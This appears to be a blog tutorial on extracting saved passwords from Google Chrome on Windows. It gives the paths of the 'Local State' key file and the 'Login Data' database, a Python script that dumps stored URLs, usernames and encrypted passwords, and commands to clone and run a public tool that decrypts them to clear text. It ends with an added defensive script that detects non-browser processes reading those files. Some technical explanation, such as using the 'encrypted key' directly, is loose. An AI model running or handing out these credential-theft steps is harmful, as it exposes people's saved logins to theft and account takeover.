Hacking Saved Passwords in Google Chrome

If you have the habit of saving your passwords in the browser, you are at great risk of having these passwords discovered by hackers.
I will show you how hackers find the passwords that are saved in your browser, but first, let’s understand a little bit about how they are stored on your computer.
We will break it down into 4 parts to manually collect the passwords, and in the end, I will explain how to do it automatically with a script.
1. Locating the encryption key
The key is stored in a JSON file named Local State, which can be found in the Google Chrome User Data folder.
notepad C:\Users\<YOUR PC>\AppData\Local\Google\Chrome\User Data\Local State
Open the file with a text editor (e.g., Notepad, as in the command above), search for “encrypted_key” in the file, and you will find the key. Save it.

2. Locating the encrypted passwords
The encrypted passwords are stored in an SQLite database named Login Data, which can be found in the Default folder of Google Chrome:
C:\Users\<YOUR PC>\AppData\Local\Google\Chrome\User Data\Default\Login Data
To access this data, we will use Python 3 to extract the information:
import shutil
import sqlite3
import os

# Chrome username & password file path (replace <YOUR PC> with your Windows user name)
chrome_path_login_db = "C:\\Users\\<YOUR PC>\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"

# Copy Chrome login data to current directory
shutil.copy2(chrome_path_login_db, "Loginvault.db")

# Connect to sqlite database
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()

# Select statement to retrieve info
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
for index, login in enumerate(cursor.fetchall()):
    url = login[0]
    username = login[1]
    ciphertext = login[2]  # still encrypted at this point
    print("Url:", url)
    print("Username:", username)
    print("Cipher Text:", ciphertext)

# Close the cursor and connection
cursor.close()
conn.close()

# Clean up by removing copied database file
os.remove("Loginvault.db")
You will get output like this:

The output will contain the Url of the website where the password is saved, the Username (usually the user’s saved email address), and the Cipher Text, which is the password encrypted with AES, a symmetric-key cipher.
3. Decrypting saved passwords
Because AES is a symmetric-key cipher, the same key is used to encrypt and to decrypt, so we can use the encrypted key we obtained to decrypt the passwords. For this we will use public code from GitHub.
git clone https://github.com/ohyicong/decrypt-chrome-passwords
cd decrypt-chrome-passwords
python decrypt_chrome_password.py
This way you will get clean output with the URL, Username and password in clear text.
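Seen from the defender's side, the steps above leave a recognisable trace: a process that is not the browser opens both Local State and Login Data. The following is an added example, not code from this post or from the linked GitHub project, that flags this pattern in file-access telemetry. The event tuple layout, the allow-listed Chrome path, the 5-minute window and all sample events are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# Files read in parts 1 and 2: the key store and the login database.
SENSITIVE = {"local state": "key", "login data": "db"}
PROFILE_MARKER = "\\google\\chrome\\user data\\"
# Assumption: only the installed browser binary should open these files.
# Full path, not file name: a copied "chrome.exe" elsewhere must still alert.
ALLOWED_IMAGES = {r"c:\program files\google\chrome\application\chrome.exe"}
WINDOW = timedelta(minutes=5)  # assumed correlation window

# Constructed sample events: (time, pid, process image, file opened).
UD = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
PY = r"C:\Users\alice\AppData\Local\Programs\Python\python.exe"
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:00", 4120, CHROME, UD + r"\Local State"),
    ("2024-05-01T10:00:01", 4120, CHROME, UD + r"\Default\Login Data"),
    ("2024-05-01T10:07:10", 7788, PY, UD + r"\Local State"),
    ("2024-05-01T10:07:12", 7788, PY, UD + r"\Default\Login Data"),
    ("2024-05-01T11:30:00", 9001, r"C:\Tools\backup.exe", UD + r"\Default\Login Data"),
]

def classify(target):
    """Return 'key' or 'db' for a Chrome credential file, else None."""
    t = target.lower()
    if PROFILE_MARKER not in t:
        return None
    return SENSITIVE.get(ntpath.basename(t))

def detect(events):
    """Alert on non-browser access; 'high' = key and database within WINDOW."""
    seen = defaultdict(dict)  # (pid, image) -> {kind: first access time}
    for ts, pid, image, target in events:
        kind = classify(target)
        if kind is None or image.lower() in ALLOWED_IMAGES:
            continue
        seen[(pid, image)].setdefault(kind, datetime.fromisoformat(ts))
    alerts = []
    for (pid, image), kinds in seen.items():
        both = len(kinds) == 2 and abs(kinds["key"] - kinds["db"]) <= WINDOW
        sev = "high" if both else "medium"
        alerts.append({"pid": pid, "image": image, "files": sorted(kinds), "severity": sev})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Backup and sync tools that legitimately read the profile will show up as medium alerts and should be allow-listed by full path after review.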
